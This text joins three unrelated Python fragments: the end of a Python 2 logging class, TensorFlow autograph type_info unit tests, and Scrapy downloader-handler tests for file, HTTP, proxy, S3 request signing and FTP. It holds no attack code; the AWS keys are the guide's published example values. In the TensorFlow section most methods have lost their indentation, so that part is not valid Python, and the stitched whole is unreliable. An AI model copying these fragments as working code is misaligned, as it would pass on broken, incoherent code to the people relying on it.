				self._syslog.debug(self._prefixed(level,source,line))
			else:
				print self._prefixed(level,source,line)
				sys.stdout.flush()
	def info (self,message,source='',level='INFO'):
		for line in message.split('\n'):
			if self._syslog:
				self._syslog.info(self._prefixed(level,source,line))
			else:
				print self._prefixed(level,source,line)
				sys.stdout.flush()
	def warning (self,message,source='',level='WARNING'):
		for line in message.split('\n'):
			if self._syslog:
				self._syslog.warning(self._prefixed(level,source,line))
			else:
				print self._prefixed(level,source,line)
				sys.stdout.flush()
	def error (self,message,source='',level='ERROR'):
		for line in message.split('\n'):
			if self._syslog:
				self._syslog.error(self._prefixed(level,source,line))
			else:
				print self._prefixed(level,source,line)
				sys.stdout.flush()
	def critical (self,message,source='',level='CRITICAL'):
		for line in message.split('\n'):
			if self._syslog:
				self._syslog.critical(self._prefixed(level,source,line))
			else:
				print self._prefixed(level,source,line)
				sys.stdout.flush()
		self.pdb(level)
	def raw (self,message):
		# emit without timestamp/source prefixing
		for line in message.split('\n'):
			if self._syslog:
				self._syslog.critical(line)
			else:
				print line
				sys.stdout.flush()
	# show the message on the wire
	def network (self,message,recorder='info'):
		up = short(recorder)
		if self._network and getattr(syslog,'LOG_%s' % up) <= self.level:
			getattr(self,recorder.lower())(message,'network')
		else:
			self._record(time.localtime(),'network',recorder,message)
		self.pdb(recorder)
	# show the message on the wire
	def wire (self,message,recorder='debug'):
		up = short(recorder)
		if self._wire and getattr(syslog,'LOG_%s' % up) <= self.level:
			getattr(self,recorder.lower())(message,'wire')
		else:
			self._record(time.localtime(),'wire',recorder,message)
		self.pdb(recorder)
	# show the exchange of message between peers
	def message (self,message,recorder='info'):
		up = short(recorder)
		if self._message and getattr(syslog,'LOG_%s' % up) <= self.level:
			getattr(self,recorder.lower())(message,'message')
		else:
			self._record(time.localtime(),'message',recorder,message)
		self.pdb(recorder)
	# show the parsing of the configuration
	def configuration (self,message,recorder='info'):
		up = short(recorder)
		if self._configuration and getattr(syslog,'LOG_%s' % up) <= self.level:
			getattr(self,recorder.lower())(message,'configuration')
		else:
			self._record(time.localtime(),'configuration',recorder,message)
		self.pdb(recorder)
	# show the exchange of message generated by the reactor (^C and signal received)
	def reactor (self,message,recorder='info'):
		up = short(recorder)
		if self._reactor and getattr(syslog,'LOG_%s' % up) <= self.level:
			getattr(self,recorder.lower())(message,'reactor')
		else:
			self._record(time.localtime(),'reactor',recorder,message)
		self.pdb(recorder)
	# show the change of rib table
	def rib (self,message,recorder='info'):
		up = short(recorder)
		if self._rib and getattr(syslog,'LOG_%s' % up) <= self.level:
			getattr(self,recorder.lower())(message,'rib')
		else:
			self._record(time.localtime(),'rib',recorder,message)
		self.pdb(recorder)
	# show the change of rib table
	def timers (self,message,recorder='debug'):
		up = short(recorder)
		if self._timer and getattr(syslog,'LOG_%s' % up) <= self.level:
			getattr(self,recorder.lower())(message,'timers')
		else:
			self._record(time.localtime(),'timers',recorder,message)
		self.pdb(recorder)
	# show the exchange of message generated by the daemon feature (change pid, fork, ...)
	def daemon (self,message,recorder='info'):
		up = short(recorder)
		if self._daemon and getattr(syslog,'LOG_%s' % up) <= self.level:
			getattr(self,recorder.lower())(message,'daemon')
		else:
			self._record(time.localtime(),'daemon',recorder,message)
		self.pdb(recorder)
	# show the exchange of message generated by the forked processes
	def processes (self,message,recorder='info'):
		up = short(recorder)
		if self._processes and getattr(syslog,'LOG_%s' % up) <= self.level:
			getattr(self,recorder.lower())(message,'processes')
		else:
			self._record(time.localtime(),'processes',recorder,message)
		self.pdb(recorder)
	# show the exchange of message generated by the routes received
	def routes (self,message,recorder='info'):
		up = short(recorder)
		if self._routes and getattr(syslog,'LOG_%s' % up) <= self.level:
			getattr(self,recorder.lower())(message,'routes')
		else:
			self._record(time.localtime(),'routes',recorder,message)
		self.pdb(recorder)
	# show how the message received are parsed
	def parser (self,message,recorder='info'):
		up = short(recorder)
		if self._parser and getattr(syslog,'LOG_%s' % up) <= self.level:
			getattr(self,recorder.lower())(message,'parser')
		# NOTE(review): unlike the other recorders, the disabled path does
		# not _record() into history here — confirm whether intentional.
		self.pdb(recorder)
def Logger ():
    """Return the process-wide _Logger singleton, creating it on first use."""
    if _Logger._instance is None:
        _Logger._instance = _Logger()
    return _Logger._instance
class FakeLogger:
    """Stand-in logger: any attribute resolves to a callable printing to stdout."""

    def __getattr__ (self, name):
        def _log (data, _=None):
            return sys.stdout.write('Fake logger [%s]\n' % str(data))
        return _log
# Manual smoke test: emit one record through several recorders.
if __name__ == '__main__':
	logger = Logger()
	logger.wire('wire packet content')
	logger.message('message exchanged')
	logger.debug('debug test')
|
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for type_info module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.autograph.pyct import anno
from tensorflow.python.autograph.pyct import cfg
from tensorflow.python.autograph.pyct import parser
from tensorflow.python.autograph.pyct import qual_names
from tensorflow.python.autograph.pyct import transformer
from tensorflow.python.autograph.pyct.static_analysis import activity
from tensorflow.python.autograph.pyct.static_analysis import live_values
from tensorflow.python.autograph.pyct.static_analysis import reaching_definitions
from tensorflow.python.autograph.pyct.static_analysis import type_info
from tensorflow.python.client import session
from tensorflow.python.platform import test
from tensorflow.python.training import training
class ScopeTest(test.TestCase):
  """Tests for type_info.Scope value storage and parent-chain lookup."""

  def test_basic(self):
    scope = type_info.Scope(None)
    self.assertFalse(scope.hasval('foo'))
    scope.setval('foo', 'bar')
    self.assertTrue(scope.hasval('foo'))
    self.assertFalse(scope.hasval('baz'))

  def test_nesting(self):
    outer = type_info.Scope(None)
    outer.setval('foo', '')
    inner = type_info.Scope(outer)
    # Lookups fall through to the parent scope...
    self.assertTrue(inner.hasval('foo'))
    self.assertTrue(outer.hasval('foo'))
    inner.setval('bar', '')
    # ...but values set in a child never leak upward.
    self.assertTrue(inner.hasval('bar'))
    self.assertFalse(outer.hasval('bar'))
class TypeInfoResolverTest(test.TestCase):
def _parse_and_analyze(self,
test_fn,
namespace,
arg_types=None):
node, source = parser.parse_entity(test_fn)
entity_info = transformer.EntityInfo(
source_code=source,
source_file=None,
namespace=namespace,
arg_values=None,
arg_types=arg_types,
owner_type=None)
node = qual_names.resolve(node)
graphs = cfg.build(node)
ctx = transformer.Context(entity_info)
node = activity.resolve(node, ctx)
node = reaching_definitions.resolve(node, ctx, graphs,
reaching_definitions.Definition)
node = live_values.resolve(node, ctx, {})
node = type_info.resolve(node, ctx)
node = live_values.resolve(node, ctx, {})
return node
def test_constructor_detection(self):
def test_fn():
opt = training.GradientDescentOptimizer(0.1)
return opt
node = self._parse_and_analyze(test_fn, {'training': training})
call_node = node.body[0].body[0].value
self.assertTrue(anno.getanno(call_node, 'is_constructor'))
self.assertEquals(training.GradientDescentOptimizer,
anno.getanno(call_node, 'type'))
self.assertEquals((training.__name__, 'GradientDescentOptimizer'),
anno.getanno(call_node, 'type_fqn'))
def test_constructor_detection_builtin_class(self):
def test_fn(x):
res = zip(x)
return res
node = self._parse_and_analyze(test_fn, {})
call_node = node.body[0].body[0].value
self.assertFalse(anno.hasanno(call_node, 'is_constructor'))
def test_class_members_of_detected_constructor(self):
def test_fn():
opt = training.GradientDescentOptimizer(0.1)
opt.minimize(0)
node = self._parse_and_analyze(test_fn, {'training': training})
method_call = node.body[0].body[1].value.func
self.assertEquals(training.GradientDescentOptimizer.minimize,
anno.getanno(method_call, 'live_val'))
def test_class_members_in_with_stmt(self):
def test_fn(x):
with session.Session() as sess:
sess.run(x)
node = self._parse_and_analyze(test_fn, {'session': session})
constructor_call = node.body[0].body[0].items[0].context_expr
self.assertEquals(session.Session, anno.getanno(constructor_call, 'type'))
self.assertEquals((session.__name__, 'Session'),
anno.getanno(constructor_call, 'type_fqn'))
method_call = node.body[0].body[0].body[0].value.func
self.assertEquals(session.Session.run, anno.getanno(method_call,
'live_val'))
def test_constructor_data_dependent(self):
    """No live value is resolved when the constructed object is ambiguous."""

    def test_fn(x):
        if x > 0:
            opt = training.GradientDescentOptimizer(0.1)
        else:
            opt = training.GradientDescentOptimizer(0.01)
        opt.minimize(0)

    node = self._parse_and_analyze(test_fn, {'training': training})
    minimize_call = node.body[0].body[1].value.func
    self.assertFalse(anno.hasanno(minimize_call, 'live_val'))
def test_parameter_class_members(self):
    """Member access on an untyped parameter cannot be resolved."""

    def test_fn(opt):
        opt.minimize(0)

    node = self._parse_and_analyze(test_fn, {})
    minimize_call = node.body[0].body[0].value.func
    self.assertFalse(anno.hasanno(minimize_call, 'live_val'))
def test_parameter_class_members_with_value_hints(self):
    """arg_types hints allow member resolution on parameters."""

    def test_fn(opt):
        opt.minimize(0)

    hints = {
        'opt': (training.GradientDescentOptimizer.__name__,
                training.GradientDescentOptimizer)
    }
    node = self._parse_and_analyze(test_fn, {}, arg_types=hints)
    minimize_call = node.body[0].body[0].value.func
    self.assertEquals(
        anno.getanno(minimize_call, 'live_val'),
        training.GradientDescentOptimizer.minimize)
def test_function_variables(self):
def bar():
pass
def test_fn():
foo = bar
foo()
node = self._parse_and_analyze(test_fn, {'bar': bar})
method_call = node.body[0].body[1].value.func
self.assertFalse(anno.hasanno(method_call, 'live_val'))
def test_nested_members(self):
    """Deep attribute chains on a constructed object stay unresolved."""

    def test_fn():
        foo = training.GradientDescentOptimizer(0.1)
        foo.bar.baz()

    node = self._parse_and_analyze(test_fn, {'training': training})
    chained_call = node.body[0].body[1].value.func
    self.assertFalse(anno.hasanno(chained_call, 'live_val'))
def test_nested_unpacking(self):
    """Types propagate through nested tuple unpacking; live values do not."""

    class Foo(object):
        pass

    class Bar(object):
        pass

    def test_fn():
        a, (b, c) = (Foo(), (Bar(), Foo()))
        return a, b, c

    node = self._parse_and_analyze(test_fn, {'Foo': Foo, 'Bar': Bar})
    a, b, c = node.body[0].body[1].value.elts
    self.assertEquals(anno.getanno(a, 'type'), Foo)
    self.assertEquals(anno.getanno(b, 'type'), Bar)
    self.assertEquals(anno.getanno(c, 'type'), Foo)
    for unpacked in (a, b, c):
        self.assertFalse(anno.hasanno(unpacked, 'live_val'))
# Run the test suite when this module is executed directly.
if __name__ == '__main__':
    test.main()
|
|
import os
import twisted
import six
from twisted.trial import unittest
from twisted.protocols.policies import WrappingFactory
from twisted.python.filepath import FilePath
from twisted.internet import reactor, defer, error
from twisted.web import server, static, util, resource
from twisted.web.test.test_webclient import ForeverTakingResource, \
NoLengthResource, HostHeaderResource, \
PayloadResource, BrokenDownloadResource
from twisted.protocols.ftp import FTPRealm, FTPFactory
from twisted.cred import portal, checkers, credentials
from twisted.protocols.ftp import FTPClient, ConnectionLost
from w3lib.url import path_to_file_uri
from scrapy import twisted_version
from scrapy.core.downloader.handlers import DownloadHandlers
from scrapy.core.downloader.handlers.file import FileDownloadHandler
from scrapy.core.downloader.handlers.http import HTTPDownloadHandler, HttpDownloadHandler
from scrapy.core.downloader.handlers.http10 import HTTP10DownloadHandler
from scrapy.core.downloader.handlers.http11 import HTTP11DownloadHandler
from scrapy.core.downloader.handlers.s3 import S3DownloadHandler
from scrapy.core.downloader.handlers.ftp import FTPDownloadHandler
from scrapy.spiders import Spider
from scrapy.http import Request
from scrapy.settings import Settings
from scrapy import optional_features
from scrapy.utils.test import get_crawler
from scrapy.exceptions import NotConfigured
from tests.mockserver import MockServer
from tests.spiders import SingleRequestSpider
class DummyDH(object):
    """Minimal download handler stand-in that always loads successfully."""

    def __init__(self, crawler):
        # Accept the crawler argument but keep no state.
        pass
class OffDH(object):
    """Download handler stand-in that refuses configuration.

    Used to verify DownloadHandlers records schemes whose handler raised
    NotConfigured during instantiation.
    """

    def __init__(self, crawler):
        raise NotConfigured
class LoadTestCase(unittest.TestCase):
    """Verify how DownloadHandlers loads entries from DOWNLOAD_HANDLERS."""

    def test_enabled_handler(self):
        """A loadable handler class ends up registered in dh._handlers."""
        handlers = {'scheme': 'tests.test_downloader_handlers.DummyDH'}
        crawler = get_crawler(settings_dict={'DOWNLOAD_HANDLERS': handlers})
        dh = DownloadHandlers(crawler)
        self.assertIn('scheme', dh._handlers)
        self.assertNotIn('scheme', dh._notconfigured)

    def test_not_configured_handler(self):
        """A handler raising NotConfigured is tracked in dh._notconfigured."""
        handlers = {'scheme': 'tests.test_downloader_handlers.OffDH'}
        crawler = get_crawler(settings_dict={'DOWNLOAD_HANDLERS': handlers})
        dh = DownloadHandlers(crawler)
        self.assertNotIn('scheme', dh._handlers)
        self.assertIn('scheme', dh._notconfigured)

    def test_disabled_handler(self):
        """A scheme explicitly set to None is neither loaded nor flagged."""
        handlers = {'scheme': None}
        crawler = get_crawler(settings_dict={'DOWNLOAD_HANDLERS': handlers})
        dh = DownloadHandlers(crawler)
        self.assertNotIn('scheme', dh._handlers)
        self.assertNotIn('scheme', dh._notconfigured)
class FileTestCase(unittest.TestCase):
    """Tests for the file:// download handler."""

    def setUp(self):
        # The '^' suffix exercises percent-encoding in the URL (%5E).
        self.tmpname = self.mktemp()
        fd = open(self.tmpname + '^', 'w')
        fd.write('0123456789')
        fd.close()
        self.download_request = FileDownloadHandler(Settings()).download_request

    def test_download(self):
        """A local file is returned with status 200 and its full contents."""
        def _test(response):
            self.assertEquals(response.url, request.url)
            self.assertEquals(response.status, 200)
            self.assertEquals(response.body, '0123456789')

        request = Request(path_to_file_uri(self.tmpname + '^'))
        # Sanity check: the '^' must have been percent-encoded by w3lib.
        assert request.url.upper().endswith('%5E')
        return self.download_request(request, Spider('foo')).addCallback(_test)

    def test_non_existent(self):
        """Downloading a missing file fails with IOError."""
        request = Request('file://%s' % self.mktemp())
        d = self.download_request(request, Spider('foo'))
        return self.assertFailure(d, IOError)
class HttpTestCase(unittest.TestCase):
    """Exercise a download handler against a local twisted.web test site.

    Subclasses override download_handler_cls to run this same suite against
    the HTTP/1.0, HTTP/1.1 and deprecated handlers.
    """

    download_handler_cls = HTTPDownloadHandler

    def setUp(self):
        # A small static site with special endpoints: a redirect, endpoints
        # that never finish ('wait', 'hang-after-headers'), a response with
        # no Content-Length, a Host-header echo, a 100-byte POST echo and a
        # deliberately broken download.
        name = self.mktemp()
        os.mkdir(name)
        FilePath(name).child("file").setContent("0123456789")
        r = static.File(name)
        r.putChild("redirect", util.Redirect("/file"))
        r.putChild("wait", ForeverTakingResource())
        r.putChild("hang-after-headers", ForeverTakingResource(write=True))
        r.putChild("nolength", NoLengthResource())
        r.putChild("host", HostHeaderResource())
        r.putChild("payload", PayloadResource())
        r.putChild("broken", BrokenDownloadResource())
        self.site = server.Site(r, timeout=None)
        self.wrapper = WrappingFactory(self.site)
        self.port = reactor.listenTCP(0, self.wrapper, interface='127.0.0.1')
        self.portno = self.port.getHost().port
        self.download_handler = self.download_handler_cls(Settings())
        self.download_request = self.download_handler.download_request

    @defer.inlineCallbacks
    def tearDown(self):
        yield self.port.stopListening()
        if hasattr(self.download_handler, 'close'):
            yield self.download_handler.close()

    def getURL(self, path):
        """Absolute URL for `path` on the local test server."""
        return "http://127.0.0.1:%d/%s" % (self.portno, path)

    def test_download(self):
        request = Request(self.getURL('file'))
        d = self.download_request(request, Spider('foo'))
        d.addCallback(lambda r: r.body)
        d.addCallback(self.assertEquals, "0123456789")
        return d

    def test_download_head(self):
        """HEAD responses carry an empty body."""
        request = Request(self.getURL('file'), method='HEAD')
        d = self.download_request(request, Spider('foo'))
        d.addCallback(lambda r: r.body)
        d.addCallback(self.assertEquals, '')
        return d

    def test_redirect_status(self):
        """The handler itself must not follow redirects; 302 is returned."""
        request = Request(self.getURL('redirect'))
        d = self.download_request(request, Spider('foo'))
        d.addCallback(lambda r: r.status)
        d.addCallback(self.assertEquals, 302)
        return d

    def test_redirect_status_head(self):
        request = Request(self.getURL('redirect'), method='HEAD')
        d = self.download_request(request, Spider('foo'))
        d.addCallback(lambda r: r.status)
        d.addCallback(self.assertEquals, 302)
        return d

    @defer.inlineCallbacks
    def test_timeout_download_from_spider(self):
        spider = Spider('foo')
        meta = {'download_timeout': 0.2}
        # client connects but no data is received
        request = Request(self.getURL('wait'), meta=meta)
        d = self.download_request(request, spider)
        yield self.assertFailure(d, defer.TimeoutError, error.TimeoutError)
        # client connects, server send headers and some body bytes but hangs
        request = Request(self.getURL('hang-after-headers'), meta=meta)
        d = self.download_request(request, spider)
        yield self.assertFailure(d, defer.TimeoutError, error.TimeoutError)

    def test_host_header_not_in_request_headers(self):
        def _test(response):
            self.assertEquals(response.body, '127.0.0.1:%d' % self.portno)
            self.assertEquals(request.headers, {})

        request = Request(self.getURL('host'))
        return self.download_request(request, Spider('foo')).addCallback(_test)

    def test_host_header_seted_in_request_headers(self):
        # (method name typo kept so existing test IDs stay stable)
        # Fix: removed an unreachable duplicate of the request/assertions
        # that previously sat after the return statement.
        def _test(response):
            self.assertEquals(response.body, 'example.com')
            self.assertEquals(request.headers.get('Host'), 'example.com')

        request = Request(self.getURL('host'), headers={'Host': 'example.com'})
        return self.download_request(request, Spider('foo')).addCallback(_test)

    def test_payload(self):
        body = '1'*100  # PayloadResource requires body length to be 100
        request = Request(self.getURL('payload'), method='POST', body=body)
        d = self.download_request(request, Spider('foo'))
        d.addCallback(lambda r: r.body)
        d.addCallback(self.assertEquals, body)
        return d
class DeprecatedHttpTestCase(HttpTestCase):
    """HTTP 1.0 test case"""
    # Re-runs the HttpTestCase suite via the deprecated HttpDownloadHandler.
    download_handler_cls = HttpDownloadHandler
class Http10TestCase(HttpTestCase):
    """HTTP 1.0 test case"""
    # Same suite as HttpTestCase, run against the HTTP/1.0 handler.
    download_handler_cls = HTTP10DownloadHandler
class Http11TestCase(HttpTestCase):
    """HTTP 1.1 test case"""
    download_handler_cls = HTTP11DownloadHandler
    # HTTP/1.1 support requires twisted >= 11.1.0.
    if 'http11' not in optional_features:
        skip = 'HTTP1.1 not supported in twisted < 11.1.0'

    def test_download_without_maxsize_limit(self):
        """Without any maxsize setting the full body is downloaded."""
        request = Request(self.getURL('file'))
        d = self.download_request(request, Spider('foo'))
        d.addCallback(lambda r: r.body)
        d.addCallback(self.assertEquals, "0123456789")
        return d

    @defer.inlineCallbacks
    def test_download_with_maxsize(self):
        """A maxsize equal to the body size passes; one byte less aborts."""
        request = Request(self.getURL('file'))

        # 10 is minimal size for this request and the limit is only counted on
        # response body. (regardless of headers)
        d = self.download_request(request, Spider('foo', download_maxsize=10))
        d.addCallback(lambda r: r.body)
        d.addCallback(self.assertEquals, "0123456789")
        yield d

        d = self.download_request(request, Spider('foo', download_maxsize=9))
        yield self.assertFailure(d, defer.CancelledError, error.ConnectionAborted)

    @defer.inlineCallbacks
    def test_download_with_maxsize_per_req(self):
        """download_maxsize in request meta aborts an oversized download."""
        meta = {'download_maxsize': 2}
        request = Request(self.getURL('file'), meta=meta)
        d = self.download_request(request, Spider('foo'))
        yield self.assertFailure(d, defer.CancelledError, error.ConnectionAborted)

    @defer.inlineCallbacks
    def test_download_with_small_maxsize_per_spider(self):
        """A too-small spider-level download_maxsize aborts the download."""
        request = Request(self.getURL('file'))
        d = self.download_request(request, Spider('foo', download_maxsize=2))
        yield self.assertFailure(d, defer.CancelledError, error.ConnectionAborted)

    def test_download_with_large_maxsize_per_spider(self):
        """A spider-level download_maxsize above the body size is a no-op."""
        request = Request(self.getURL('file'))
        d = self.download_request(request, Spider('foo', download_maxsize=100))
        d.addCallback(lambda r: r.body)
        d.addCallback(self.assertEquals, "0123456789")
        return d
class Http11MockServerTestCase(unittest.TestCase):
    """HTTP 1.1 test case with MockServer"""
    if 'http11' not in optional_features:
        skip = 'HTTP1.1 not supported in twisted < 11.1.0'

    def setUp(self):
        self.mockserver = MockServer()
        self.mockserver.__enter__()

    def tearDown(self):
        self.mockserver.__exit__(None, None, None)

    @defer.inlineCallbacks
    def test_download_with_content_length(self):
        """Content-Length above download_maxsize cancels the download."""
        crawler = get_crawler(SingleRequestSpider)
        # http://localhost:8998/partial set Content-Length to 1024, use download_maxsize= 1000 to avoid
        # download it
        yield crawler.crawl(seed=Request(url='http://localhost:8998/partial', meta={'download_maxsize': 1000}))
        failure = crawler.spider.meta['failure']
        self.assertIsInstance(failure.value, defer.CancelledError)

    @defer.inlineCallbacks
    def test_download(self):
        crawler = get_crawler(SingleRequestSpider)
        yield crawler.crawl(seed=Request(url='http://localhost:8998'))
        failure = crawler.spider.meta.get('failure')
        self.assertIsNone(failure)
        reason = crawler.spider.meta['close_reason']
        # Fix: assertTrue(reason, 'finished') treated 'finished' as the
        # failure *message* and passed for any truthy reason.
        self.assertEqual(reason, 'finished')

    @defer.inlineCallbacks
    def test_download_gzip_response(self):
        if six.PY2 and twisted_version > (12, 3, 0):
            crawler = get_crawler(SingleRequestSpider)
            body = '1'*100  # PayloadResource requires body length to be 100
            request = Request('http://localhost:8998/payload', method='POST',
                              body=body, meta={'download_maxsize': 50})
            yield crawler.crawl(seed=request)
            failure = crawler.spider.meta['failure']
            # download_maxsize < 100, hence the CancelledError
            self.assertIsInstance(failure.value, defer.CancelledError)

            request.headers.setdefault('Accept-Encoding', 'gzip,deflate')
            request = request.replace(url='http://localhost:8998/xpayload')
            yield crawler.crawl(seed=request)
            # download_maxsize = 50 is enough for the gzipped response
            failure = crawler.spider.meta.get('failure')
            self.assertIsNone(failure)
            reason = crawler.spider.meta['close_reason']
            # Fix: same assertTrue(reason, 'finished') message pitfall.
            self.assertEqual(reason, 'finished')
        else:
            raise unittest.SkipTest("xpayload and payload endpoint only enabled for twisted > 12.3.0 and python 2.x")
class UriResource(resource.Resource):
    """Return the full uri that was requested"""

    def getChild(self, path, request):
        # Handle every sub-path with this same resource.
        return self

    def render(self, request):
        # Echo the raw request URI back as the response body, so tests can
        # check what the server actually received (proxy vs direct requests).
        return request.uri
class HttpProxyTestCase(unittest.TestCase):
    """Check that requests are routed through a proxy set in request meta."""

    download_handler_cls = HTTPDownloadHandler

    def setUp(self):
        # Local server that echoes the requested URI; it plays the proxy role.
        site = server.Site(UriResource(), timeout=None)
        wrapper = WrappingFactory(site)
        self.port = reactor.listenTCP(0, wrapper, interface='127.0.0.1')
        self.portno = self.port.getHost().port
        self.download_handler = self.download_handler_cls(Settings())
        self.download_request = self.download_handler.download_request

    @defer.inlineCallbacks
    def tearDown(self):
        yield self.port.stopListening()
        if hasattr(self.download_handler, 'close'):
            yield self.download_handler.close()

    def getURL(self, path):
        """Absolute URL for `path` on the local echo server."""
        return "http://127.0.0.1:%d/%s" % (self.portno, path)

    def test_download_with_proxy(self):
        """With meta['proxy'] set, the proxy sees the absolute target URL."""
        def _test(response):
            self.assertEquals(response.status, 200)
            self.assertEquals(response.url, request.url)
            self.assertEquals(response.body, 'http://example.com')

        http_proxy = self.getURL('')
        request = Request('http://example.com', meta={'proxy': http_proxy})
        return self.download_request(request, Spider('foo')).addCallback(_test)

    def test_download_with_proxy_https_noconnect(self):
        """'?noconnect' proxies https URLs without a CONNECT tunnel."""
        def _test(response):
            self.assertEquals(response.status, 200)
            self.assertEquals(response.url, request.url)
            self.assertEquals(response.body, 'https://example.com')

        http_proxy = '%s?noconnect' % self.getURL('')
        request = Request('https://example.com', meta={'proxy': http_proxy})
        return self.download_request(request, Spider('foo')).addCallback(_test)

    def test_download_without_proxy(self):
        """Without meta['proxy'] the server sees only the request path."""
        def _test(response):
            self.assertEquals(response.status, 200)
            self.assertEquals(response.url, request.url)
            self.assertEquals(response.body, '/path/to/resource')

        request = Request(self.getURL('path/to/resource'))
        return self.download_request(request, Spider('foo')).addCallback(_test)
class DeprecatedHttpProxyTestCase(HttpProxyTestCase):
    """Old deprecated reference to http10 downloader handler.

    Fix: previously subclassed unittest.TestCase directly, so no proxy tests
    were actually run against the deprecated handler; it must inherit
    HttpProxyTestCase (mirroring DeprecatedHttpTestCase/HttpTestCase) for
    download_handler_cls to take effect.
    """
    download_handler_cls = HttpDownloadHandler
class Http10ProxyTestCase(HttpProxyTestCase):
    # Proxy suite re-run against the HTTP/1.0 download handler.
    download_handler_cls = HTTP10DownloadHandler
class Http11ProxyTestCase(HttpProxyTestCase):
    # Proxy suite re-run against the HTTP/1.1 download handler.
    download_handler_cls = HTTP11DownloadHandler
    # HTTP/1.1 support requires twisted >= 11.1.0.
    if 'http11' not in optional_features:
        skip = 'HTTP1.1 not supported in twisted < 11.1.0'
class HttpDownloadHandlerMock(object):
    """Fake HTTP handler whose download_request echoes the request back.

    Lets tests inspect the (signed/rewritten) request instead of performing
    any network I/O.
    """

    def __init__(self, settings):
        # Settings are accepted but ignored; the mock keeps no state.
        pass

    def download_request(self, request, spider):
        return request
class S3TestCase(unittest.TestCase):
    """Check AWS request signing against the worked examples from the S3
    developer guide; the expected Authorization values come from that doc."""
    skip = 'boto' not in optional_features and 'missing boto library'

    # test use same example keys than amazon developer guide
    # http://s3.amazonaws.com/awsdocs/S3/20060301/s3-dg-20060301.pdf
    # and the tests described here are the examples from that manual
    AWS_ACCESS_KEY_ID = '0PN5J17HBGZHT7JJ3X82'
    AWS_SECRET_ACCESS_KEY = 'uV3F3YluFJax1cknvbcGwgjvx4QpvB+leU8dUj2o'

    def setUp(self):
        # The mocked HTTP handler returns the signed request itself, so each
        # test can inspect the generated Authorization header directly.
        s3reqh = S3DownloadHandler(Settings(), self.AWS_ACCESS_KEY_ID, \
                self.AWS_SECRET_ACCESS_KEY, \
                httpdownloadhandler=HttpDownloadHandlerMock)
        self.download_request = s3reqh.download_request
        self.spider = Spider('foo')

    def test_request_signing1(self):
        # gets an object from the johnsmith bucket.
        req = Request('s3://johnsmith/photos/puppy.jpg',
                headers={'Date': 'Tue, 27 Mar 2007 19:36:42 +0000'})
        httpreq = self.download_request(req, self.spider)
        self.assertEqual(httpreq.headers['Authorization'], \
                'AWS 0PN5J17HBGZHT7JJ3X82:xXjDGYUmKxnwqr5KXNPGldn5LbA=')

    def test_request_signing2(self):
        # puts an object into the johnsmith bucket.
        req = Request('s3://johnsmith/photos/puppy.jpg', method='PUT', headers={
            'Content-Type': 'image/jpeg',
            'Date': 'Tue, 27 Mar 2007 21:15:45 +0000',
            'Content-Length': '94328',
            })
        httpreq = self.download_request(req, self.spider)
        self.assertEqual(httpreq.headers['Authorization'], \
                'AWS 0PN5J17HBGZHT7JJ3X82:hcicpDDvL9SsO6AkvxqmIWkmOuQ=')

    def test_request_signing3(self):
        # lists the content of the johnsmith bucket.
        req = Request('s3://johnsmith/?prefix=photos&max-keys=50&marker=puppy', \
                method='GET', headers={
                    'User-Agent': 'Mozilla/5.0',
                    'Date': 'Tue, 27 Mar 2007 19:42:41 +0000',
                    })
        httpreq = self.download_request(req, self.spider)
        self.assertEqual(httpreq.headers['Authorization'], \
                'AWS 0PN5J17HBGZHT7JJ3X82:jsRt/rhG+Vtp88HrYL706QhE4w4=')

    def test_request_signing4(self):
        # fetches the access control policy sub-resource for the 'johnsmith' bucket.
        req = Request('s3://johnsmith/?acl', \
                method='GET', headers={'Date': 'Tue, 27 Mar 2007 19:44:46 +0000'})
        httpreq = self.download_request(req, self.spider)
        self.assertEqual(httpreq.headers['Authorization'], \
                'AWS 0PN5J17HBGZHT7JJ3X82:thdUi9VAkzhkniLj96JIrOPGi0g=')

    def test_request_signing5(self):
        # deletes an object from the 'johnsmith' bucket using the
        # path-style and Date alternative.
        req = Request('s3://johnsmith/photos/puppy.jpg', \
                method='DELETE', headers={
                    'Date': 'Tue, 27 Mar 2007 21:20:27 +0000',
                    'x-amz-date': 'Tue, 27 Mar 2007 21:20:26 +0000',
                    })
        httpreq = self.download_request(req, self.spider)
        self.assertEqual(httpreq.headers['Authorization'], \
                'AWS 0PN5J17HBGZHT7JJ3X82:k3nL7gH3+PadhTEVn5Ip83xlYzk=')

    def test_request_signing6(self):
        # uploads an object to a CNAME style virtual hosted bucket with metadata.
        req = Request('s3://static.johnsmith.net:8080/db-backup.dat.gz', \
                method='PUT', headers={
                    'User-Agent': 'curl/7.15.5',
                    'Host': 'static.johnsmith.net:8080',
                    'Date': 'Tue, 27 Mar 2007 21:06:08 +0000',
                    'x-amz-acl': 'public-read',
                    'content-type': 'application/x-download',
                    'Content-MD5': '4gJE4saaMU4BqNR0kLY+lw==',
                    'X-Amz-Meta-ReviewedBy': 'joe@johnsmith.net,jane@johnsmith.net',
                    'X-Amz-Meta-FileChecksum': '0x02661779',
                    'X-Amz-Meta-ChecksumAlgorithm': 'crc32',
                    'Content-Disposition': 'attachment; filename=database.dat',
                    'Content-Encoding': 'gzip',
                    'Content-Length': '5913339',
                    })
        httpreq = self.download_request(req, self.spider)
        self.assertEqual(httpreq.headers['Authorization'], \
                'AWS 0PN5J17HBGZHT7JJ3X82:C0FlOtU8Ylb9KDTpZqYkZPX91iI=')

    def test_request_signing7(self):
        # ensure that spaces are quoted properly before signing
        req = Request(
                ("s3://johnsmith/photos/my puppy.jpg"
                 "?response-content-disposition=my puppy.jpg"),
                method='GET',
                headers={
                    'Date': 'Tue, 27 Mar 2007 19:42:41 +0000',
                    })
        httpreq = self.download_request(req, self.spider)
        self.assertEqual(
            httpreq.headers['Authorization'],
            'AWS 0PN5J17HBGZHT7JJ3X82:+CfvG8EZ3YccOrRVMXNaK2eKZmM=')
class FTPTestCase(unittest.TestCase):
    """Tests for the ftp:// download handler against a local twisted FTP server."""

    username = "scrapy"
    password = "passwd"

    if twisted_version < (10, 2, 0):
        skip = "Twisted pre 10.2.0 doesn't allow to set home path other than /home"

    def setUp(self):
        # setup dirs and test file
